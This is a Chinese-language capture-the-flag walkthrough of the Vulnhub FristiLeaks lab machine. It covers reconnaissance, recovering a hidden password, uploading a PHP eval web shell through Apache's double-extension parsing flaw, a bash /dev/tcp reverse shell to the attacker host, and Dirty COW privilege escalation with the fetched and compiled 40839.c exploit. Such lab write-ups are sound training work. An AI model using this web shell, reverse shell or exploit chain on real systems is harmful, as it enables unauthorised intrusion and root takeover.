Vulnhub FristiLeaks靶机渗透

VM上配置

VMware users will need to manually edit the VM's MAC address to: 08:00:27:A5:A6:76
VM上选择本靶机，编辑-》网络适配器-》高级-》修改MAC地址
打开靶机

信息搜集

nmap -sP 192.168.146.0/24 #主机发现
nmap -A 192.168.146.150 #综合扫描

访问web端，查看源码

robots.txt里面的几个目录访问后都是一张图片

那就扫描下目录，dirb结合bp来使用
dirb url #当然也可以直接在后面指定字典

没发现什么敏感信息。
搜集搜集。。。
最后尝试将fristi作为路径，访问http://192.168.146.150/fristi/进入了后台。。。

先看看源码，得到一些提示

iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==

解密一下这个base64，发现是png

keKkeKKeKKeKkEkkEk感觉像是密码，尝试登陆下。
admin无法登录，但是刚刚那里提示署名是eezeepz。使用这个用户名可以成功登陆

getFlag

文件上传getshell

文件上传，那就直接上传文件把。
只能上传后缀.png,.jpg的文件，但是apache2.2是存在解析漏洞的（nmap扫描已经得知了）
所以抓包将php文件改后缀为php.jpg即可上传成功

<?php @eval($_POST[A1oe]); ?>

然后蚁剑连上

连上后速览一下，然后虚拟终端反弹shell。这里没有nc命令直接用bash命令。（也可以直接上传反弹shell的php脚本）
bash -i >& /dev/tcp/192.168.146.132/4444 0>&1

提权

查看系统版本

发现是2.6.32，而我们知道脏牛提权影响范围：Linux内核>=2.6.22可以看到非常接近，如果没打补丁，肯定是可以利用的。
searchsploit cow

分别看一看这几个文件，发现40839.c文件直接编译执行就行比较方便，所以选择用这个

# 使用方式:本机把脚本down下来，然后开启web服务供靶机使用wget下载
root@kali:~# cp /usr/share/exploitdb/exploits/linux/local/40839.c /var/www/html/
root@kali:~# service apache2 start

# 靶机
wget http://192.168.146.132/40839.c
gcc -pthread 40839.c -o dirty -lcrypt
./dirty A1oe
su firefart

成功提权获得flag

总结

目录扫描很重要。
复习了下脏牛。